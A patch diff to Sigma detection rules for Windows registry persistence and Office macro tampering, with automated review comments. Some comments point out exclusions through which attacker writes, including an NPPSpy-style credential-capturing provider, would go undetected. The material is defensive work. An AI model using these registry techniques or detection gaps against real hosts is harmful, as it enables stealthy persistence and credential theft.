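Review bot: In the second hunk the opt-in `P9NP` line, once uncommented as the comment instructs, joins the same path-only filter list as WebClient, LanmanWorkstation and RDPNP, so with `condition: ... not 1 of filter*` every write under `\Services\P9NP\NetworkProvider` is suppressed regardless of which process made it; a provider an attacker registers under that service name would then be invisible to this rule, which is exactly the NPPSpy-style technique it targets. The neighbouring `filter_valid_procs` already shows the rule scoping an exclusion by `Image`, and the same shape would suit a WSL exclusion if the installing process is known. At minimum the comment should state the trade-off, e.g. `# Related to WSL. Enabling this suppresses any provider registered under this service name; prefer pairing it with an Image filter`. Which process writes the P9NP key on a WSL host is not visible here and would need checking before a tighter filter is written.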
@@ -31,8 +31,7 @@ detection: TargetObject|contains: \Microsoft Excel Driver Details|startswith: C:\Progra Details|endswith: \ACEODBC.DLL - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Likely level: low diff --git a/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml b/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml index 570054966..304bd8959 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious ODBC Driver Registered id: e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4 status: experimental -description: Detects the registration of a new ODBC driver where the driver is located - in a potentially suspicious location +description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location references: - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml index d78e38de6..56bc2cbf8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml 
@@ -1,12 +1,10 @@ title: Trust Access Disable For VBApplications id: 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: obsoletes + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd + type: obsoletes status: test -description: Detects registry changes to Microsoft Office "AccessVBOM" to a value - of "1" which disables trust access for VBA on the victim machine and lets attackers - execute malicious macros without any Microsoft Office warnings. +description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml b/sigma/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml index fa69c94ec..1ba046e9f 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml 
@@ -1,11 +1,10 @@ title: Microsoft Office Protected View Disabled id: a5c7a43f-6009-4a8c-80c5-32abf1c53ecc related: - - id: 7c637634-c95d-4bbf-b26c-a82510874b34 - type: obsoletes + - id: 7c637634-c95d-4bbf-b26c-a82510874b34 + type: obsoletes status: test -description: Detects changes to Microsoft Office protected view registry keys with - which the attacker disables this feature. +description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ @@ -32,10 +31,10 @@ detection: selection_values_1: Details: DWORD (0x00000001) TargetObject|endswith: - - \DisableAttachementsInPV - - \DisableInternetFilesInPV - - \DisableIntranetCheck - - \DisableUnsafeLocationsInPV + - \DisableAttachementsInPV # Turn off Protected View for attachments opened from Outlook + - \DisableInternetFilesInPV # Turn off Protected View for files downloaded from Internet zone + - \DisableIntranetCheck # Turn off Protected View for file located in UNC paths + - \DisableUnsafeLocationsInPV # Turn off Protected View for unsafe locations selection_values_0: Details: DWORD (0x00000000) TargetObject|endswith: diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_enable_dde.yml b/sigma/sysmon/registry/registry_set/registry_set_office_enable_dde.yml index 83e2206b5..57a8772c9 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_enable_dde.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_enable_dde.yml 
@@ -1,8 +1,7 @@ title: Enable Microsoft Dynamic Data Exchange id: 63647769-326d-4dde-a419-b925cc0caf42 status: test -description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions - of Microsoft Word or Excel. +description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. references: - https://msrc.microsoft.com/update-guide/vulnerability/ADV170021 author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml index 9d392a6b0..a9aef0c79 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting id: 396ae3eb-4174-4b9b-880e-dc0364d78a19 status: experimental -description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" - which if enabled allows the automatic loading of any configured VBA project/module +description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 - https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml index cc1e279a0..b7aac31e3 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml 
+++ b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml @@ -1,8 +1,7 @@ title: Outlook Macro Execution Without Warning Setting Enabled id: e3b50fa5-3c3f-444e-937b-0a99d33731cd status: test -description: Detects the modification of Outlook security setting to allow unprompted - execution of macros. +description: Detects the modification of Outlook security setting to allow unprompted execution of macros. references: - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 @@ -25,7 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetObject|endswith: \Outlook\Security\Level - Details|contains: '0x00000001' + Details|contains: '0x00000001' # Enable all Macros condition: registry_set and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml index 79a52cb64..2e9fc3a8e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml 
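Review bot: `Details|contains: '0x00000001'` is looser than the value the new `# Enable all Macros` comment documents; Sysmon renders a REG_DWORD as `DWORD (0x00000001)`, and a substring match could also fire on other encodings that happen to embed that hex string, while sibling rules touched in this same patch use the exact form (`Details: DWORD (0x00000001)` in the Protected View rule). For consistency and precision, `Details: DWORD (0x00000001) # Level = 1: enable all macros without a warning` would pin the intended value.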
@@ -1,13 +1,12 @@ title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 related: - - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a - type: similar - - id: 55f0a3a1-846e-40eb-8273-677371b8d912 - type: similar + - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a + type: similar + - id: 55f0a3a1-846e-40eb-8273-677371b8d912 # ProcCreation variation + type: similar status: experimental -description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" - which allows outlook to run applications or execute macros +description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros references: - https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml index 99f140d8d..579fc6c90 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml @@ -1,8 +1,8 @@ title: Outlook Security Settings Updated - Registry id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: similar + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd # EnableUnsafeClientMailRules + type: similar status: test description: Detects changes to the registry values related to outlook security settings references: 
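Review bot: The comment added to the `related` entry in `registry_set_office_outlook_security_settings.yml` labels `a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd` as `EnableUnsafeClientMailRules`, but elsewhere in this same patch that id belongs to "Macro Enabled In A Potentially Suspicious Document" (the trust-records rule), whereas the EnableUnsafeClientMailRules registry rule carries id `6763c6c8-bd01-4687-bc8d-4fa52cf8ba08` and itself lists `c3cefdf4-…` (this rule) as similar. Either the new comment or the id is wrong; given the reciprocal link, `- id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 # EnableUnsafeClientMailRules` looks like the intended reference. Stale `related` ids matter because analysts and tooling follow them to the sibling rule during triage.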
diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml b/sigma/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml index c7e400502..9784ef97a 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml @@ -1,11 +1,10 @@ title: Macro Enabled In A Potentially Suspicious Document id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd related: - - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2 - type: derived + - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2 + type: derived status: experimental -description: Detects registry changes to Office trust records where the path is located - in a potentially suspicious location +description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location references: - https://twitter.com/inversecos/status/1494174785621819397 - Internal Research @@ -27,6 +26,7 @@ detection: TargetObject|contains: \Security\Trusted Documents\TrustRecords selection_paths: TargetObject|contains: + # Note: add more locations where you don't expect a user to executed macro enabled docs - /AppData/Local/Microsoft/Windows/INetCache/ - /AppData/Local/Temp/ - /PerfLogs/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml b/sigma/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml index 304d3455e..41d421e3e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml 
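Review bot: The new comment in `selection_paths` reads `where you don't expect a user to executed macro enabled docs`, which is ungrammatical and slightly misleading since, per the rule title, the trust record is written when a user enables content in a document. Suggest `# Note: add more locations from which you would not expect a user to enable macros in a document (paths use forward slashes, as stored in TrustRecords)`, the parenthetical matching the `/AppData/...` form the list already uses.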
@@ -1,12 +1,10 @@ title: Uncommon Microsoft Office Trusted Location Added id: f742bde7-9528-42e5-bd82-84f51a8387d2 related: - - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac - type: derived + - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac + type: derived status: experimental -description: Detects changes to registry keys related to "Trusted Location" of Microsoft - Office where the path is set to something uncommon. Attackers might add additional - trusted locations to avoid macro security restrictions. +description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. references: - Internal Research - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 @@ -44,10 +42,8 @@ detection: Image|contains: - :\Program Files\Microsoft Office\ - :\Program Files (x86)\Microsoft Office\ - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_exclude_*) + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_exclude_*) falsepositives: - - Other unknown legitimate or custom paths need to be filtered to avoid false - positives + - Other unknown legitimate or custom paths need to be filtered to avoid false positives level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml index ff2f26c42..8829dc6d3 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml 
@@ -1,11 +1,10 @@ title: Office Macros Auto-Enabled id: 91239011-fe3c-4b54-9f24-15c86bb65913 related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: obsoletes + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd + type: obsoletes status: test -description: Detects registry changes to Microsoft Office "VBAWarning" to a value - of "1" which enables the execution of all macros, whether signed or unsigned. +description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml index cad937f93..df65f4081 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml 
@@ -1,15 +1,10 @@ title: Potential Persistence Via AppCompat RegisterAppRestart Layer id: b86852fb-4c77-48f9-8519-eb1b2c308b59 status: experimental -description: 'Detects the setting of the REGISTERAPPRESTART compatibility layer on - an application. - - This compatibility layer allows an application to register for restart using the - "RegisterApplicationRestart" API. - +description: | + Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. + This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism. - - ' references: - https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml index 3a2971fdf..02140e4f8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml 
@@ -1,18 +1,11 @@ title: Potential Persistence Via App Paths Default Property id: 707e097c-e20f-4f67-8807-1f72ff4500d6 status: experimental -description: 'Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App - Paths\ registry. Which might be used as a method of persistence - +description: | + Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. - - First, to map an application''s executable file name to that file''s fully qualified - path. - - Second, to prepend information to the PATH environment variable on a per-application, - per-process basis. - - ' + First, to map an application's executable file name to that file's fully qualified path. + Second, to prepend information to the PATH environment variable on a per-application, per-process basis. references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN @@ -36,6 +29,7 @@ detection: - (Default) - Path Details|contains: + # Add more suspicious paths or binaries as you see fit. - \Users\Public - \AppData\Local\Temp\ - \Windows\Temp\ @@ -56,7 +50,6 @@ detection: - .ps1 condition: registry_set and selection falsepositives: - - Legitimate applications registering their binary from on of the suspicious locations - mentioned above (tune it) + - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it) level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml index 8c44ce85b..93158a510 100644 
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via AutodialDLL id: e6fe26ee-d063-4f5b-b007-39e90aaf50e3 status: experimental -description: Detects change the the "AutodialDLL" key which could be used as a persistence - method to load custom DLL via the "ws2_32" library +description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library references: - https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/ - https://persistence-info.github.io/Data/autodialdll.html diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_chm.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_chm.yml index fc3fa3905..b12c4258d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_chm.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_chm.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via CHM Helper DLL id: 976dd1f2-a484-45ec-aa1d-0e87e882262b status: experimental -description: Detects when an attacker modifies the registry key "HtmlHelp Author" - to achieve persistence +description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence references: - https://persistence-info.github.io/Data/htmlhelpauthor.html - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 0929dc38a..9f64c6d02 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml 
@@ -1,11 +1,9 @@ title: Potential Persistence Via COM Hijacking From Suspicious Locations id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77 status: experimental -description: Detects potential COM object hijacking where the "Server" (In/Out) is - pointing to a suspicious or unsuale location +description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location references: - - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ - (idea) + - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 modified: 2023/09/28 @@ -25,12 +23,12 @@ detection: TargetObject|endswith: - \InprocServer32\(Default) - \LocalServer32\(Default) - Details|contains: + Details|contains: # Add more suspicious paths and locations - \AppData\Local\Temp\ - \Desktop\ - \Downloads\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - - \System32\spool\drivers\color\ + - \System32\spool\drivers\color\ # as seen in the knotweed blog - \Users\Public\ - \Windows\Temp\ - '%appdata%' @@ -38,7 +36,6 @@ detection: - '%tmp%' condition: registry_set and selection falsepositives: - - Probable legitimate applications. If you find these please add them to an exclusion - list + - Probable legitimate applications. If you find these please add them to an exclusion list level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml index 99e4c515e..2e2ac15d8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml 
@@ -1,8 +1,7 @@ title: Potential PSFactoryBuffer COM Hijacking id: 243380fa-11eb-4141-af92-e14925e77c1b status: experimental -description: Detects changes to the PSFactory COM InProcServer32 registry. This technique - was used by RomCom to create persistence storing a malicious DLL. +description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. references: - https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine - https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml index bf5abfb27..a385ce49f 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml @@ -1,10 +1,7 @@ title: Potential Persistence Via Custom Protocol Handler id: fdbf0b9d-0182-4c43-893b-a1eaab92d085 status: experimental -description: Detects potential persistence activity via the registering of a new custom - protocole handlers. While legitimate applications register protocole handlers - often times during installation. And attacker can abuse this by setting a custom - handler to be used as a persistence mechanism. +description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. references: - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -25,16 +22,18 @@ detection: TargetObject|startswith: HKCR\ Details|startswith: 'URL:' filter_main_ms_trusted: - Details|startswith: URL:ms- + Details|startswith: URL:ms- # Microsoft Protocols usually start with "ms-" filter_main_generic_locations: - Image|startswith: + Image|startswith: # Add more folders to avoid FP - C:\Program Files (x86) - C:\Program Files\ - C:\Windows\System32\ - C:\Windows\SysWOW64\ + # Uncomment This section to add specific Protocol Handler names that are know + # filter_specific: + # Details: 'URL:' condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - Many legitimate applications can register a new custom protocol handler. Additional - filters needs to applied according to your environment. + - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment. level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml index 83e31723b..98f265a1b 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Event Viewer Events.asp id: a1e11042-a74a-46e6-b07c-c4ce8ecc239b status: test -description: Detects potential registry persistence technique using the Event Viewer - "Events.asp" technique +description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique references: - https://twitter.com/nas_bench/status/1626648985824788480 - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks 
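Review bot: The commented-out `filter_specific` placeholder would have no effect even after an operator uncomments it, because the condition on the following line negates only `1 of filter_main_*`; the template should be named to match, e.g. `# filter_main_specific:` / `#     Details: 'URL:<known-handler-name>'`, or the condition should be widened to `filter_*`. As a template, `Details: 'URL:'` is also a poor starting point, since an exact match would only ever hit a `Details` value of literally `URL:`; `Details|startswith` with full `URL:name` strings reads as the intended shape. Separately, `C:\Program Files (x86)` in `filter_main_generic_locations` lacks the trailing backslash the other three entries carry, so it also prefixes any sibling directory whose name begins with that string; `C:\Program Files (x86)\` closes that gap.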
@@ -24,15 +23,17 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: + # Covers both "\Policies\" and "\Software\" paths for both "Machine" and "User" level configs + # Also "MicrosoftRedirectionProgramCommandLineParameters" key TargetObject|contains: - \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram - \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionURL filter_default_redirect_program: - Image|endswith: C:\WINDOWS\system32\svchost.exe + Image|endswith: C:\WINDOWS\system32\svchost.exe # Set via GPO TargetObject|endswith: \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram Details: '%%SystemRoot%%\PCHealth\HelpCtr\Binaries\HelpCtr.exe' filter_default_redirect_program_cli: - Image|endswith: C:\WINDOWS\system32\svchost.exe + Image|endswith: C:\WINDOWS\system32\svchost.exe # Set via GPO TargetObject|endswith: \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgramCommandLineParameters Details: -url hcp://services/centers/support?topic=%%s filter_url: diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml index 21a2bd8c6..5bc4537b2 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml 
@@ -1,11 +1,10 @@ title: Potential Persistence Via GlobalFlags id: 36803969-5421-41ec-b92f-8500f79c23b0 related: - - id: c81fe886-cac0-4913-a511-2822d72ff505 - type: obsoletes + - id: c81fe886-cac0-4913-a511-2822d72ff505 + type: obsoletes status: test -description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit - keys +description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_ie.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_ie.yml index d215a50fc..f1a1c8d30 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_ie.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_ie.yml 
@@ -1,10 +1,7 @@ title: Modification of IE Registry Settings id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 status: experimental -description: Detects modification of the registry settings used for Internet Explorer - and other Windows components that use these settings. An attacker can abuse this - registry key to add a domain to the trusted sites Zone or insert javascript for - persistence +description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry @@ -23,8 +20,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection_domains: - TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\Internet - Settings + TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\Internet Settings filter_dword: Details|startswith: DWORD filter_office: @@ -40,6 +36,7 @@ detection: filter_binary: Details: Binary Data filter_accepted_documents: + # Spotted during office installations TargetObject|contains: \Accepted Documents\ condition: registry_set and (selection_domains and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml index c7469fc49..780643e8d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml 
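Review bot: `filter_accepted_documents` drops every event whose `TargetObject` contains `\Accepted Documents\`, yet the new comment says the noise was only `Spotted during office installations`; a bare substring exclusion on a subkey name is wider than the observation supports and gives an actor a path fragment under which writes to Internet Settings go unreported. Consider narrowing it to the writing process, e.g. adding `Image|contains: '\Microsoft Office\'` (or whichever installer image was observed — the comment does not say) alongside the `TargetObject|contains` line, as the neighbouring `filter_office` block may already do; that block's contents lie outside this hunk, as does `selection_domains`' surrounding `detection` start.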
@@ -1,11 +1,7 @@ title: Register New IFiltre For Persistence id: b23818c7-e575-4d13-8012-332075ec0a2b status: experimental -description: Detects when an attacker register a new IFilter for an extension. Microsoft - Windows Search uses filters to extract the content of items for inclusion in a - full-text index. You can extend Windows Search to index new or proprietary file - types by writing filters to extract the content, and property handlers to extract - the properties of files +description: Detects when an attacker register a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files references: - https://persistence-info.github.io/Data/ifilters.html - https://twitter.com/0gtweet/status/1468548924600459267 
@@ -36,36 +32,40 @@ detection:
 TargetObject|contains: \PersistentAddinsRegistered\{89BCB740-6119-101A-BCB7-00DD010655AF}
 filter_default_targets:
 TargetObject|contains:
- - \CLSID\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\
